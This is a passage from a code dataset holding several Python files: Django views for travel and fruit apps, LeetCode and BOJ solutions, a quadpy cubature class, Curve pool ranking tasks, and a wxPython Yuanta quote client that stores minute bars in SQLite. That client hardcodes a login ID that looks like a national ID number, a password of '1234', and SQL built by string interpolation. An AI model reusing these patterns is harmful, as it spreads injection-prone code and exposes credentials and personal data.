'maxScore:',maxScore)\n","repo_name":"suoyita/DD2421-Machine-Learning","sub_path":"decision_trees/python/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4684035325","text":"from django.views.generic import TemplateView\n\nfrom destination.models import Country\nfrom users.models import Testimoni\nfrom .models import Team, SosmedTeam\n\nclass Index(TemplateView):\n template_name='about/index.html'\n \n def get_context_data(self, **kwargs):\n allTeam = Team.objects.all()\n context = super().get_context_data(**kwargs)\n context['listTeam'] = allTeam\n context['place'] = 'About'\n context['aboutActive'] = 'active'\n context['listCountry'] = Country.objects.all().order_by('name')\n context['listTestimoni'] = Testimoni.objects.filter(is_show=True)\n context['title_blocks_cover'] = 'About ZeeTrav'\n sosmed = []\n for team in allTeam:\n sosmed.append([SosmedTeam.objects.filter(team=team).order_by('name')])\n context['listSosmed'] = sosmed\n return context\n ","repo_name":"zeetec20/travel","sub_path":"about/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"37416186471","text":"\"\"\"676. Implement Magic Dictionary\"\"\"\n\nfrom typing import List\n\n\nclass MagicDictionary:\n def __init__(self):\n self._tree: dict[int, set[str]] = {}\n\n def buildDict(self, dictionary: List[str]) -> None:\n for word in dictionary:\n if len(word) not in self._tree:\n self._tree[len(word)] = {word}\n else:\n self._tree[len(word)].add(word)\n\n def search(self, searchWord: str) -> bool:\n if len(searchWord) not in self._tree:\n return False\n\n for word in self._tree[len(searchWord)]:\n if self._distance(word, searchWord):\n return True\n\n return False\n\n def _distance(self, word1: str, word2: str) -> int:\n count = 0\n\n for idx, char in enumerate(word1):\n if char != word2[idx]:\n count += 1\n if count > 1:\n return 0\n\n return count\n","repo_name":"linzeyang/leetcode-solutions","sub_path":"medium/0676.py","file_name":"0676.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17597049264","text":"import math\n\ntime = int(input())\n\n\ndef hotel(t) :\n for i in range(t) :\n h, w, p = map(int, input().split())\n if h == 1 :\n head = str(1)\n elif (p % h) == 0 :\n head = str(h)\n else :\n head = str(p % h)\n tail = str(math.ceil(p / h))\n if len(tail) == 1 :\n tail = '0' + tail\n print(int(head + tail))\n\n\nhotel(time)","repo_name":"tldjfj123/PS","sub_path":"BOJ/10250.py","file_name":"10250.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31839149445","text":"# -*- coding: UTF-8 -*-\n# Author: 元大證券資訊部溫鳳祥\n# Desc: 使用元大報價 API 取得分 K 資料並寫入 SQLite DB\n\nimport wx, wx.grid, time, sys\nfrom ctypes import byref, POINTER, windll\nfrom comtypes import IUnknown, GUID\nfrom comtypes.client import GetModule, GetBestInterface, GetEvents\nuser32 = windll.user32\natl = windll.atl\nimport sqlite3\n\n\n# 計算分 K 資料\nreq_type = -1\nmatch_hour = -1\nmatch_min = -1\nopen_pri = -1\nhigh_pri = -1\nlow_pri = -1\nclose_pri = -1\ntol_match_qty = -1\ntol_match_qty_prev = -1\n\n# grid column definitions\nCOL_MATCH_TIME = 0\nCOL_SYMBOL = 1\nCOL_OPEN_PRICE = 2\nCOL_HIGH_PRICE = 3\nCOL_LOW_PRICE = 4\nCOL_CLOSE_PRICE = 5\nCOL_TOTAL_QTY = 6\nCOL_REQ_TYPE = 7\n\n\n# ----------------------------------------------------------------------\ndef GetTimeStr():\n return time.strftime('%Y%m%d %H:%M:%S', time.localtime(time.time()))\n\n# ----------------------------------------------------------------------\nclass YuantaQuoteEvents(object):\n def __init__(self, parent, frame):\n self.parent = parent\n self.frame = frame\n def OnMktStatusChange (self, this, Status, Msg, ReqType):\n print ('OnMktStatusChange {},{},{}'.format (ReqType, Msg, Status))\n self.frame.tcLoginStatus.Clear()\n self.frame.tcLoginStatus.WriteText('{} {} ReqType={}'.format(GetTimeStr(), Msg, ReqType))\n def OnRegError(self, this, symbol, updmode, ErrCode, ReqType):\n print ('OnRegError {},{},{},{}'.format (ReqType, ErrCode, symbol, updmode))\n def OnGetMktData(self, this, PriType, symbol, Qty, Pri, ReqType):\n print ('OnGetMktData')\n def OnGetMktQuote(self, this, symbol, DisClosure, Duration, ReqType):\n print ('OnGetMktQuote')\n def OnGetMktAll(self, this, symbol, RefPri, OpenPri, HighPri, LowPri, UpPri, DnPri, MatchTime, MatchPri, MatchQty, TolMatchQty,\n BestBuyQty, BestBuyPri, BestSellQty,BestSellPri, FDBPri, FDBQty, FDSPri, FDSQty, ReqType):\n global req_type, match_hour, match_min, open_pri, high_pri, low_pri, close_pri, tol_match_qty, tol_match_qty_prev\n # print('OnGetMktAll: {} {} c:{} o:{} h:{} l:{} v:{}'.format(ReqType, MatchTime, MatchPri, OpenPri, HighPri, LowPri, TolMatchQty))\n\n req_type_tmp = int(ReqType)\n match_hour_tmp = int(MatchTime[0:2])\n match_min_tmp = int(MatchTime[2:4])\n match_sec_tmp = int(MatchTime[4:6])\n match_ms_tmp = int(MatchTime[6:])\n open_pri_tmp = int(OpenPri)\n high_pri_tmp = int(HighPri)\n low_pri_tmp = int(LowPri)\n close_pri_tmp = int(MatchPri)\n tol_match_qty_tmp = int(TolMatchQty)\n print('OnGetMktAll: {:02d}:{:02d}:{:02d}.{:06d} [{}] o:{} h:{} l:{} c:{} v:{} r:{}'.format(\n match_hour_tmp, match_min_tmp, match_sec_tmp, match_ms_tmp,\n symbol, open_pri_tmp, high_pri_tmp, low_pri_tmp, close_pri_tmp,\n tol_match_qty_tmp,\n req_type_tmp))\n\n if self.frame.grid1.InsertRows(0, 1):\n row = 0\n _matchTime = '{:02d}:{:02d}:{:02d}.{:06d}'.format(match_hour_tmp, match_min_tmp, match_sec_tmp, match_ms_tmp)\n self.frame.grid1.SetCellValue(row, COL_MATCH_TIME, _matchTime)\n self.frame.grid1.SetCellValue(row, COL_SYMBOL, symbol)\n self.frame.grid1.SetCellValue(row, COL_OPEN_PRICE, str(open_pri_tmp))\n self.frame.grid1.SetCellValue(row, COL_HIGH_PRICE, str(high_pri_tmp))\n self.frame.grid1.SetCellValue(row, COL_LOW_PRICE, str(low_pri_tmp))\n self.frame.grid1.SetCellValue(row, COL_CLOSE_PRICE, str(close_pri_tmp))\n self.frame.grid1.SetCellValue(row, COL_TOTAL_QTY, str(tol_match_qty_tmp))\n self.frame.grid1.SetCellValue(row, COL_REQ_TYPE, str(req_type_tmp))\n\n # self.SetCellColor(self.frame.grid1, row, COL_OPEN_PRICE, RefPri, OpenPri)\n # self.SetCellColor(self.frame.grid1, row, COL_HIGH_PRICE, RefPri, HighPri)\n # self.SetCellColor(self.frame.grid1, row, COL_LOW_PRICE, RefPri, LowPri)\n # self.SetCellColor(self.frame.grid1, row, COL_MATCH_PRICE, RefPri, MatchPri)\n\n if req_type != req_type_tmp or match_hour != match_hour_tmp or match_min != match_min_tmp:\n if req_type > -1 and match_hour > -1 and match_min > -1:\n # print('OnGetMktAll: Write MinK: {:02d}:{:02d} [{}] o:{} h:{} l:{} c:{} v:{} r:{}'.format(\n # match_hour, match_min, symbol, open_pri, high_pri, low_pri, close_pri, tol_match_qty - tol_match_qty_prev, req_type))\n frame.WriteMinK(match_hour, match_min, symbol, open_pri, high_pri, low_pri, close_pri, tol_match_qty - tol_match_qty_prev, req_type)\n tol_match_qty_prev = tol_match_qty\n tol_match_qty = tol_match_qty_tmp\n else: # first data item\n tol_match_qty = tol_match_qty_tmp\n tol_match_qty_prev = 0\n\n req_type = req_type_tmp\n match_hour = match_hour_tmp\n match_min = match_min_tmp\n open_pri = close_pri_tmp\n high_pri = close_pri_tmp\n low_pri = close_pri_tmp\n close_pri = close_pri_tmp\n\n else: # same req_type & match_hour & match_min\n if high_pri < close_pri_tmp:\n high_pri = close_pri_tmp\n if low_pri > close_pri_tmp:\n low_pri = close_pri_tmp\n close_pri = close_pri_tmp\n tol_match_qty = tol_match_qty_tmp\n\n\n def OnGetDelayClose(self, this, symbol, DelayClose, ReqType):\n print ('OnGetDelayClose')\n def OnGetBreakResume(self, this, symbol, BreakTime, ResumeTime, ReqType):\n print ('OnGetBreakResume')\n def OnGetTradeStatus(self, this, symbol, TradeStatus, ReqType):\n print ('OnGetTradeStatus')\n def OnTickRegError(self, this, strSymbol, lMode, lErrCode, ReqType):\n print ('OnTickRegError')\n def OnGetTickData(self, this, strSymbol, strTickSn, strMatchTime, strBuyPri, strSellPri, strMatchPri, strMatchQty, strTolMatQty,\n strMatchAmt, strTolMatAmt, ReqType):\n print ('OnGetTickData')\n def OnTickRangeDataError(self, this, strSymbol, lErrCode, ReqType):\n print ('OnTickRangeDataError')\n def OnGetTickRangeData(self, this, strSymbol, strStartTime, strEndTime, strTolMatQty, strTolMatAmt, ReqType):\n print ('OnGetTickRangeData')\n def OnGetTimePack(self, this, strTradeType, strTime, ReqType):\n print ('OnGetTimePack {},{}'.format (strTradeType, strTime))\n def OnGetDelayOpen(self, this, symbol, DelayOpen, ReqType):\n print ('OnGetDelayOpen')\n def OnGetFutStatus(self, this, symbol, FunctionCode, BreakTime, StartTime, ReopenTime, ReqType):\n print ('OnGetFutStatus')\n def OnGetLimitChange(self, this, symbol, FunctionCode, StatusTime, Level, ExpandType, ReqType):\n print ('OnGetLimitChange')\n\n# ----------------------------------------------------------------------\nclass YuantaQuoteWrapper:\n def __init__(self, frame):#, bot):\n # self.bot = bot\n Iwindow = POINTER(IUnknown)()\n Icontrol = POINTER(IUnknown)()\n Ievent = POINTER(IUnknown)()\n res = atl.AtlAxCreateControlEx(\"YUANTAQUOTE.YuantaQuoteCtrl.1\", frame.Handle, None,\n byref(Iwindow),\n byref(Icontrol),\n byref(GUID()),\n Ievent)\n self.YuantaQuote = GetBestInterface(Icontrol)\n self.YuantaQuoteEvents = YuantaQuoteEvents(self, frame)#, conn, cursor)\n self.YuantaQuoteEventsConnect = GetEvents(self.YuantaQuote, self.YuantaQuoteEvents)\n\n\n# ----------------------------------------------------------------------\nclass MyApp(wx.App):\n def OnInit(self):\n # self.conn, self.cursor = CreateDb('ticks.db')\n self.CreateDb('ticks.db')\n self.Yuanta = None\n return True\n\n # create DB & table\n def CreateDb(self, fileName):\n self.conn = sqlite3.connect('ticks.db')\n self.cursor = self.conn.cursor()\n sql = 'CREATE TABLE IF NOT EXISTS TK (' \\\n 'MatchTime INTEGER, '\\\n 'Symbol CHAR(25), '\\\n 'OpenPri INTEGER, '\\\n 'HighPri INTEGER, '\\\n 'LowPri INTEGER, '\\\n 'ClosePri INTEGER, '\\\n 'MatchQty INTEGER, '\\\n 'ReqType INTEGER)'\n self.cursor.execute(sql)\n # return conn, cursor\n\n def SetMktLogin(self, frame, host, port, offhour, id, pswd):\n self.frame = frame\n self.host = host\n self.port = port\n self.offhour = offhour\n self.id = id\n self.pswd = pswd\n\n self.Yuanta = YuantaQuoteWrapper(frame)\n self.Yuanta.YuantaQuote.SetMktLogon(self.id, self.pswd, self.host, self.port, self.offhour, 0)\n\n def AddMktReg(self, symbol, updMode, reqType):\n try:\n errCode = self.Yuanta.YuantaQuote.AddMktReg(symbol, updMode, reqType, 0)\n print(\"AddMktReg({}, {}, {}) = {}\".format(symbol, updMode, reqType, errCode))\n self.frame.tcRegStatus.Clear()\n self.frame.tcRegStatus.WriteText('{}: {}'.format(GetTimeStr(), str(errCode)))\n except Exception as ex:\n print(\"AddMktReg() failed: %s\" % str(ex))\n\n def DelMktReg(self, symbol, reqType):\n try:\n errCode = self.Yuanta.YuantaQuote.DelMktReg(symbol, reqType)\n print(\"DelMktReg({}, {}) = {}\".format(symbol, reqType, errCode))\n self.frame.tcRegStatus.Clear()\n self.frame.tcRegStatus.WriteText('{}: {}'.format(GetTimeStr(), str(errCode)))\n except Exception as ex:\n print(\"DelMktReg() failed: %s\" % str(ex))\n\n def Quit(self):\n print(\"Close DB connection\")\n self.conn.close()\n\n def WriteMinK(self, match_hour, match_min, symbol, open_pri, high_pri, low_pri, close_pri, match_qty, req_type):\n sql = \"INSERT INTO TK (MatchTime, Symbol, OpenPri, HighPri, LowPri, ClosePri, MatchQty, ReqType)\"\\\n \" VALUES(%02d%02d, '%s', %d, %d, %d, %d, %d, %d)\"\\\n % (match_hour, match_min, symbol, open_pri, high_pri, low_pri, close_pri, match_qty, req_type)\n print('WriteMinK: %s' % sql)\n self.cursor.execute(sql)\n self.conn.commit()\n\n\n# ----------------------------------------------------------------------\nclass MainFrame(wx.Frame):\n def __init__(self, parent, title, app, width=1000, height=700, host='10.214.8.64', port=80, id='', pswd='', symbol=''):\n super(MainFrame, self).__init__(parent, title=title, size=(width, height))\n self.app = app\n self.host = host\n self.port = port\n self.id = id\n self.pswd = pswd\n self.offhour = 1\n self.symbol = symbol\n\n self.InitUI()\n self.Centre()\n\n def InitUI(self):\n panel1 = wx.Panel(self)\n\n self.tcHost = wx.TextCtrl(panel1)\n self.tcPort = wx.TextCtrl(panel1, style=wx.TE_READONLY)\n self.tcId = wx.TextCtrl(panel1)\n self.tcPswd = wx.TextCtrl(panel1, style=wx.TE_PASSWORD)\n self.cbOffhour = wx.CheckBox(panel1, label='T+1')\n self.cbOffhour.Bind(wx.EVT_CHECKBOX, self.OnOffhour)\n self.btnLogin = wx.Button(panel1, label='Login')\n self.btnLogin.Bind(wx.EVT_BUTTON, self.OnLogin)\n self.tcLoginStatus = wx.TextCtrl(panel1, style=wx.TE_READONLY)\n # set default values\n self.tcHost.SetLabelText(self.host)\n self.tcPort.SetLabelText(str(self.port))\n self.tcId.SetLabelText(self.id)\n self.tcPswd.SetLabelText(self.pswd)\n\n self.tcSymbol = wx.TextCtrl(panel1)\n self.btnReg = wx.Button(panel1, label='Register')\n self.btnReg.Bind(wx.EVT_BUTTON, self.OnReg)\n self.btnUnreg = wx.Button(panel1, label='Unregister')\n self.btnUnreg.Bind(wx.EVT_BUTTON, self.OnUnreg)\n self.tcRegStatus = wx.TextCtrl(panel1, style=wx.TE_READONLY)\n self.btnQuit = wx.Button(panel1, label='Quit')\n self.btnQuit.Bind(wx.EVT_BUTTON, self.OnQuit)\n # set default values\n self.tcSymbol.SetLabelText(self.symbol)\n\n # info grid\n self.grid1 = wx.grid.Grid(panel1)\n self.grid1.CreateGrid(0, 8)\n self.grid1.SetColSize(0, 80)\n self.grid1.SetRowLabelSize(0)\n self.grid1.SetColLabelValue(0, '成交時間')\n self.grid1.SetColLabelValue(1, '商品代碼')\n self.grid1.SetColLabelValue(2, '開盤價')\n self.grid1.SetColLabelValue(3, '最高價')\n self.grid1.SetColLabelValue(4, '最低價')\n self.grid1.SetColLabelValue(5, '收盤價')\n self.grid1.SetColLabelValue(6, '總成交量')\n self.grid1.SetColLabelValue(7, '盤別')\n\n gs = wx.GridBagSizer(10, 10)\n gs.Add(wx.StaticText(panel1, label='Host:'), pos=(0, 0), span=(1, 1), flag=wx.EXPAND, border=5)\n gs.Add(wx.StaticText(panel1, label='Port:'), pos=(1, 0), span=(1, 1), flag=wx.EXPAND, border=5)\n gs.Add(wx.StaticText(panel1, label='ID:'), pos=(2, 0), span=(1, 1), flag=wx.EXPAND, border=5)\n gs.Add(wx.StaticText(panel1, label='Password:'), pos=(3, 0), span=(1, 1), flag=wx.EXPAND, border=5)\n gs.Add(self.cbOffhour, pos=(4, 0), span=(1, 1), flag=wx.EXPAND, border=5)\n\n gs.Add(self.tcHost, pos=(0, 1), span=(1, 4), flag=wx.EXPAND, border=5)\n gs.Add(self.tcPort, pos=(1, 1), span=(1, 1), flag=wx.EXPAND, border=5)\n gs.Add(self.tcId, pos=(2, 1), span=(1, 2), flag=wx.EXPAND, border=5)\n gs.Add(self.tcPswd, pos=(3, 1), span=(1, 2), flag=wx.EXPAND, border=5)\n gs.Add(self.btnLogin, pos=(5, 0), span=(1, 1), flag=wx.EXPAND, border=5)\n gs.Add(self.tcLoginStatus, pos=(5, 1), span=(1, 8), flag=wx.EXPAND, border=5)\n\n gs.Add(wx.StaticText(panel1, label='Symbol:'), pos=(0, 5), span=(1, 1), flag=wx.EXPAND, border=5)\n gs.Add(self.tcSymbol, pos=(0, 6), span=(1, 3), flag=wx.EXPAND, border=5)\n gs.Add(self.btnReg, pos=(1, 5), span=(1, 2), flag=wx.EXPAND, border=5)\n gs.Add(self.btnUnreg, pos=(1, 7), span=(1, 2), flag=wx.EXPAND, border=5)\n gs.Add(self.tcRegStatus, pos=(2, 5), span=(1, 4), flag=wx.EXPAND, border=5)\n\n gs.Add(self.grid1, pos=(6, 0), span=(10, 10), flag=wx.EXPAND, border=5)\n gs.Add(self.btnQuit, pos=(17, 9), span=(1, 1), flag=wx.EXPAND, border=5)\n\n panel1.SetSizer(gs)\n\n\n def OnOffhour(self, e):\n if self.cbOffhour.GetValue():\n self.offhour = 2\n self.tcPort.SetLabelText(\"82\")\n else:\n self.offhour = 1\n self.tcPort.SetLabelText(\"80\")\n\n def OnLogin(self, e):\n self.app.SetMktLogin(self, self.tcHost.GetLineText(0), self.tcPort.GetLineText(0), self.offhour, self.tcId.GetLineText(0), self.tcPswd.GetLineText(0))\n\n def OnReg(self, e):\n self.app.AddMktReg(self.tcSymbol.GetLineText(0), \"4\", self.offhour)\n\n def OnUnreg(self, e):\n self.app.DelMktReg(self.tcSymbol.GetLineText(0), self.offhour)\n\n def OnQuit(self, e):\n self.app.Quit()\n self.Close(True)\n\n def WriteMinK(self, match_hour, match_min, symbol, open_pri, high_pri, low_pri, close_pri, match_qty, req_type):\n app.WriteMinK(match_hour, match_min, symbol, open_pri, high_pri, low_pri, close_pri, match_qty, req_type)\n\n# ----------------------------------------------------------------------\nif __name__ == \"__main__\":\n app = MyApp()\n frame = MainFrame(None, \"EW Quote API + SQLite Demo\", app, width=700, height=600, \\\n # host=\"10.214.8.64\", port=80, id=\"D121242093\", pswd=\"1234\", symbol=\"TXFH9\")\n host=\"apiquote.yuantafutures.com.tw\", port=80, id=\"D121242093\", pswd=\"1234\", symbol=\"TXFH9\")\n frame.Show(True)\n app.MainLoop()\n","repo_name":"vincenttuan/yuanta_python3","sub_path":"作業/盤中即時分K/溫鳳祥.py","file_name":"溫鳳祥.py","file_ext":"py","file_size_in_byte":15672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"680271418","text":"# -*- coding: utf-8 -*-\n#\nfrom __future__ import division\n\nimport numpy\nimport sympy\n\nfrom .helpers import _s\n\nfrom ..helpers import untangle\n\n\nclass Stroud1957(object):\n \"\"\"\n A. H. Stroud,\n Remarks on the Disposition of Points in Numerical Integration Formulas,\n Mathematical Tables and Other Aids to Computation,\n Vol. 11, No. 60 (Oct., 1957), pp. 257-261,\n .\n \"\"\"\n\n def __init__(self, n, index, symbolic=False):\n frac = sympy.Rational if symbolic else lambda x, y: x / y\n sqrt = sympy.sqrt if symbolic else numpy.sqrt\n pi = sympy.pi if symbolic else numpy.pi\n sin = sympy.sin if symbolic else numpy.sin\n cos = sympy.cos if symbolic else numpy.cos\n\n self.dim = n\n if index == 2:\n self.degree = 2\n r = sqrt(3) / 6\n data = [\n (1.0, numpy.array([numpy.full(n, 2 * r)])),\n (+r, _s(n, -1, r)),\n (-r, _s(n, +1, r)),\n ]\n else:\n assert index == 3\n self.degree = 3\n n2 = n // 2 if n % 2 == 0 else (n - 1) // 2\n i_range = range(1, 2 * n + 1)\n pts = [\n [\n [sqrt(frac(2, 3)) * cos((2 * k - 1) * i * pi / n) for i in i_range],\n [sqrt(frac(2, 3)) * sin((2 * k - 1) * i * pi / n) for i in i_range],\n ]\n for k in range(1, n2 + 1)\n ]\n if n % 2 == 1:\n sqrt3pm = numpy.full(2 * n, 1 / sqrt(3))\n sqrt3pm[1::2] *= -1\n pts.append(sqrt3pm)\n pts = numpy.vstack(pts).T\n\n data = [(frac(1, 2 * n), pts)]\n\n self.points, self.weights = untangle(data)\n reference_volume = 2 ** n\n self.weights *= reference_volume\n return\n","repo_name":"kassiuskohvakka/CompPhys-project","sub_path":"env/lib/python3.6/site-packages/quadpy/ncube/stroud1957.py","file_name":"stroud1957.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"37659125753","text":"from operator import not_\n\nfrom main import db\nfrom sqlalchemy import func, and_, cast, Date, any_\nimport time\nimport os\nfrom redis import Redis # type: ignore\nimport pandas as pd\nimport json\nfrom celery.utils.log import get_task_logger\n\nfrom main.const import CHAINS, BLACKLIST\nfrom models.curve.pool import CurvePool\nfrom models.curve.snapshot import CurvePoolSnapshot\nfrom tasks.queries.graph import grt_curve_pools_query\nfrom utils import shortify_pool_name\n\n\"\"\"\nThis is used to generate the rankings for the landing page\nWe simply store the outcomes in redis\n\"\"\"\nredis = Redis(\n host=\"redis\", password=os.getenv(\"REDIS_PASSWORD\", \"\"), port=6379, db=0\n)\n\npd.options.mode.chained_assignment = None\nblacklist_filter = ~(func.lower(CurvePoolSnapshot.pool).in_(BLACKLIST.keys()))\n\nDAY = 24 * 60 * 60\nlogger = get_task_logger(__name__)\n\n\ndef get_tvl_gainers_losers():\n logger.info(\"Getting largest TVL gains & losses\")\n today = (time.time() // DAY) * DAY - DAY\n yesterday = today - DAY\n\n today_tvl_query = (\n db.session.query(\n CurvePoolSnapshot.pool,\n CurvePoolSnapshot.chain,\n CurvePool.name,\n CurvePoolSnapshot.tvl,\n )\n .join(\n CurvePool,\n and_(\n CurvePoolSnapshot.pool == CurvePool.address,\n CurvePoolSnapshot.chain == CurvePool.chain,\n ),\n )\n .filter(\n and_(\n CurvePoolSnapshot.timestamp >= today,\n CurvePoolSnapshot.timestamp < today + DAY,\n )\n )\n .filter(blacklist_filter)\n .all()\n )\n\n yesterday_tvl_query = (\n db.session.query(\n CurvePoolSnapshot.pool,\n CurvePoolSnapshot.chain,\n CurvePoolSnapshot.tvl,\n )\n .join(\n CurvePool,\n and_(\n CurvePoolSnapshot.pool == CurvePool.address,\n CurvePoolSnapshot.chain == CurvePool.chain,\n ),\n )\n .filter(\n and_(\n CurvePoolSnapshot.timestamp >= yesterday,\n CurvePoolSnapshot.timestamp < yesterday + DAY,\n )\n )\n .filter(blacklist_filter)\n .all()\n )\n if len(today_tvl_query) < 1 or len(yesterday_tvl_query) < 1:\n # on first init we won't have snapshots\n return\n\n td = pd.DataFrame(today_tvl_query)\n yd = pd.DataFrame(yesterday_tvl_query)\n\n df = pd.merge(\n yd, td, on=[\"pool\", \"chain\"], suffixes=[\"_yesterday\", \"_today\"]\n )\n # filter no value pools\n threshold = 50000\n df = df[(df[\"tvl_yesterday\"] > 0) & (df[\"tvl_today\"] > threshold)]\n df[\"tvl_growth\"] = (\n (df[\"tvl_today\"] - df[\"tvl_yesterday\"]) / df[\"tvl_yesterday\"] * 100\n )\n df[\"name\"] = df[\"name\"].apply(shortify_pool_name)\n\n losers = df.sort_values(\"tvl_growth\")[:10][\n [\"pool\", \"chain\", \"name\", \"tvl_growth\"]\n ].to_dict(orient=\"records\")\n gainers = df.sort_values(\"tvl_growth\", ascending=False)[:10][\n [\"pool\", \"chain\", \"name\", \"tvl_growth\"]\n ].to_dict(orient=\"records\")\n redis.set(\"tvl_losers\", json.dumps(losers))\n redis.set(\"tvl_gainers\", json.dumps(gainers))\n\n\ndef get_top_vol_tvl_utilization():\n logger.info(\"Getting volumes & tvl stats by chain & pool types\")\n today = int((time.time() // DAY) * DAY - DAY)\n query = (\n db.session.query(\n CurvePoolSnapshot.pool,\n CurvePoolSnapshot.chain,\n CurvePoolSnapshot.volumeUSD,\n CurvePoolSnapshot.tvl,\n CurvePool.isV2,\n CurvePool.name,\n CurvePool.assetType,\n CurvePool.poolType,\n )\n .join(\n CurvePool,\n and_(\n CurvePoolSnapshot.pool == CurvePool.address,\n CurvePoolSnapshot.chain == CurvePool.chain,\n ),\n )\n .filter(CurvePoolSnapshot.timestamp == today)\n .filter(blacklist_filter)\n .all()\n )\n if len(query) < 1:\n return\n\n df = pd.DataFrame(query)\n df[\"name\"] = df[\"name\"].apply(shortify_pool_name)\n\n def label_pool(row):\n if row[\"isV2\"]:\n return \"V2\"\n elif row[\"poolType\"] == \"CRVUSD\":\n return \"CRVUSD\"\n elif row[\"assetType\"] == 0:\n return \"V1-USD\"\n elif row[\"assetType\"] == 1:\n return \"V1-ETH\"\n elif row[\"assetType\"] == 2:\n return \"V1-BTC\"\n else:\n return \"V1-OTHER\"\n\n df[\"type\"] = df[[\"isV2\", \"poolType\", \"assetType\"]].apply(\n label_pool, axis=1\n )\n volume_breakdown = (\n df[[\"chain\", \"volumeUSD\"]]\n .groupby(\"chain\")\n .sum()\n .reset_index()\n .to_dict(orient=\"records\")\n )\n\n tvl_breakdown = (\n df[[\"chain\", \"tvl\"]]\n .groupby(\"chain\")\n .sum()\n .reset_index()\n .to_dict(orient=\"records\")\n )\n redis.set(\"volume_breakdown_chain\", json.dumps(volume_breakdown))\n redis.set(\"tvl_breakdown_chain\", json.dumps(tvl_breakdown))\n\n volume_breakdown = (\n df[[\"type\", \"volumeUSD\"]]\n .groupby(\"type\")\n .sum()\n .reset_index()\n .to_dict(orient=\"records\")\n )\n tvl_breakdown = (\n df[[\"type\", \"tvl\"]]\n .groupby(\"type\")\n .sum()\n .reset_index()\n .to_dict(orient=\"records\")\n )\n redis.set(\"volume_breakdown_type\", json.dumps(volume_breakdown))\n redis.set(\"tvl_breakdown_type\", json.dumps(tvl_breakdown))\n\n df = df[(df[\"volumeUSD\"] > 50000) & (df[\"tvl\"] > 100000)]\n df[\"liq_use\"] = df[\"volumeUSD\"] / df[\"tvl\"]\n big_users = df.sort_values(\"liq_use\", ascending=False)[:10][\n [\"pool\", \"chain\", \"name\", \"liq_use\"]\n ].to_dict(orient=\"records\")\n redis.set(\"big_users\", json.dumps(big_users))\n\n\ndef get_sizeable_trades():\n logger.info(\"Getting latest sizeable trades\")\n today = int((time.time() // DAY) * DAY - DAY)\n QUERY = \"\"\"\n {\n swapEvents(where:{timestamp_gt: %d} orderBy: amountSoldUSD orderDirection: desc first: 10) {\n tx\n amountSoldUSD\n pool {\n address\n name\n }\n }\n }\n \"\"\"\n graph_query = QUERY % today\n all_swaps = []\n for chain in CHAINS:\n data = grt_curve_pools_query(chain, graph_query)\n swaps = [\n {\n \"tx\": d[\"tx\"],\n \"value\": d[\"amountSoldUSD\"],\n \"chain\": chain,\n \"pool\": d[\"pool\"][\"address\"],\n \"name\": d[\"pool\"][\"name\"],\n }\n for d in data[\"swapEvents\"]\n ]\n all_swaps += swaps\n df = pd.DataFrame(all_swaps)\n df[\"value\"] = df[\"value\"].astype(float)\n trades = df.sort_values(\"value\", ascending=False)[:50].to_dict(\n orient=\"records\"\n )\n redis.set(\"sizeable_trades\", json.dumps(trades))\n","repo_name":"convex-community/subgraphs-api","sub_path":"app/tasks/queries/curve/rankings.py","file_name":"rankings.py","file_ext":"py","file_size_in_byte":6837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16490262218","text":"from django.shortcuts import render, redirect\nfrom regular_exam_python_web.fruits.models import Profile, Fruits\nfrom regular_exam_python_web.fruits.forms import CreateProfileForm, FruitCreateForm, FruitEditForm, FruitDeleteForm, EditProfileForm, DeleteProfileForm\n\ndef index(request):\n profile = Profile.objects.first()\n\n context = {\n 'profile': profile\n }\n\n return render(request, 'home/index.html', context=context)\n\ndef dashboard(request):\n fruits = Fruits.objects.all()\n profile = Profile.objects.first()\n\n context = {\n 'fruits': fruits,\n 'profile': profile\n }\n\n return render(request, 'dashboard/dashboard.html', context=context)\n\ndef create_profile(request):\n if request.method == 'GET':\n form = CreateProfileForm()\n else:\n form = CreateProfileForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'form': form\n }\n\n return render(request, 'profiles/create-profile.html', context=context)\n\ndef edit_profile(request):\n profile = Profile.objects.first()\n\n if request.method == 'GET':\n form = EditProfileForm(instance=profile)\n else:\n form = EditProfileForm(request.POST, instance=profile)\n\n if form.is_valid():\n form.save()\n return redirect('details profile')\n \n context = {\n 'form': form,\n 'profile': profile\n }\n\n return render(request, 'profiles/edit-profile.html', context=context)\n\ndef details_profile(request):\n profile = Profile.objects.first()\n fruits = Fruits.objects.count()\n\n context = {\n 'profile': profile,\n 'fruits_count': fruits\n }\n\n return render(request, 'profiles/details-profile.html', context=context)\n\ndef delete_profile(request):\n profile = Profile.objects.first()\n\n if request.method == 'GET':\n form = DeleteProfileForm(instance=profile)\n else:\n form = DeleteProfileForm(request.POST, instance=profile)\n\n if form.is_valid():\n form.save()\n return redirect('index')\n \n context = {\n 'form': form,\n 'profile': profile\n }\n\n return render(request, 'profiles/delete-profile.html', context=context)\n\ndef create_fruit(request):\n profile = Profile.objects.first()\n\n if request.method == 'GET':\n form = FruitCreateForm()\n else:\n form = FruitCreateForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'form': form,\n 'profile': profile\n }\n\n return render(request, 'fruits/create-fruit.html', context=context)\n\ndef details_fruit(request, pk):\n profile = Profile.objects.first()\n fruit = Fruits.objects.get(pk=pk)\n\n context = {\n 'profile': profile,\n 'fruit': fruit\n }\n\n return render(request, 'fruits/details-fruit.html', context=context)\n\ndef edit_fruit(request, pk):\n profile = Profile.objects.first()\n fruit = Fruits.objects.get(pk=pk)\n\n if request.method == 'GET':\n form = FruitEditForm(instance=fruit)\n else:\n form = FruitEditForm(request.POST, 